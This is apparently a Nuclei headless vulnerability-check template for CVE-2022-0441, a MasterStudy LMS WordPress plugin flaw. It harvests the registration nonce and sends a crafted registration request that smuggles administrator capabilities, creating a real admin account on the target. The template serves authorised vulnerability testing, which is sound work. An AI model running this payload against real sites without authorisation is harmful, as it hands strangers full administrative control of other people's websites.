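id: CVE-2022-0441

info:
  name: WordPress MasterStudy LMS Plugin Privilege Escalation
  author: dwisiswant0
  severity: critical
  description: |
    The MasterStudy LMS WordPress plugin before 2.7.6 does not validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin.
  reference:
    - https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed
  remediation: Upgrade to version >= 2.7.6.
  tags: cve,cve2022,wordpress,privx,headless

# NOTE: this is an intrusive check, not a passive version probe. A successful
# run creates a real administrator account on the target. The username and
# password are generated randomly per run (below) and are not surfaced by the
# matchers, so capture them (e.g. with request/response debugging enabled)
# and remove the account after testing. Only run against systems you are
# authorized to test.
variables:
  username: "{{to_lower(rand_text_alphanumeric(6))}}"
  password: "{{rand_text_alphanumeric(8)}}"

headless:
  - steps:
      # Load the front page so the plugin's front-end JS globals referenced by
      # the script steps below are present in the page context.
      - action: navigate
        args:
          url: "{{BaseURL}}/"

      - action: waitload

      # Registration nonce exposed by the plugin's JS.
      - action: script
        name: nonce
        code: "stm_lms_nonces.stm_lms_register"

      # AJAX endpoint URL exposed by the plugin's JS (expected to be admin-ajax.php,
      # see the matcher below).
      - action: script
        name: endpoint
        code: "stm_lms_ajaxurl"

      - action: setmethod
        args:
          part: request
          method: POST

      # Each setheader step needs both a header name and a value. The
      # conventional value for X-Requested-With is XMLHttpRequest, mirroring
      # the plugin's own XHR registration call.
      - action: setheader
        args:
          part: request
          key: X-Requested-With
          value: XMLHttpRequest

      # The request body below is JSON; "application/json" is a media type,
      # i.e. the value of Content-Type, not a header name in its own right.
      - action: setheader
        args:
          part: request
          key: Content-Type
          value: application/json

      # profile_default_fields_for_register is the unvalidated input the
      # advisory describes: smuggling wp_capabilities through it makes the
      # newly registered user an administrator.
      - action: setbody
        args:
          part: request
          body: |
            {
              "user_login": "{{username}}",
              "user_email": "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com",
              "user_password": "{{password}}",
              "user_password_re": "{{password}}",
              "become_instructor": "",
              "privacy_policy": true,
              "degree": "",
              "expertize": "",
              "auditory": "",
              "additional": [],
              "additional_instructors": [],
              "profile_default_fields_for_register": {
                "wp_capabilities": {
                  "value": {
                    "administrator": 1
                  }
                }
              }
            }

      # Submit the registration to the plugin's AJAX action with the nonce
      # harvested above.
      - action: navigate
        name: register
        args:
          url: "{{endpoint}}?action=stm_lms_register&nonce={{nonce}}"

      - action: waitload

      - action: script
        name: status
        code: "status" # extract JSON object response

    # All three must hold. The nonce/endpoint matchers only confirm the plugin
    # globals were found; the "success" match on the registration response is
    # what indicates the account was actually created.
    matchers-condition: and
    matchers:
      - type: regex
        part: nonce
        regex:
          - "^[a-f0-9]+"

      - type: word
        part: endpoint
        words:
          - "admin-ajax.php"

      - type: word
        part: status
        words:
          - "success"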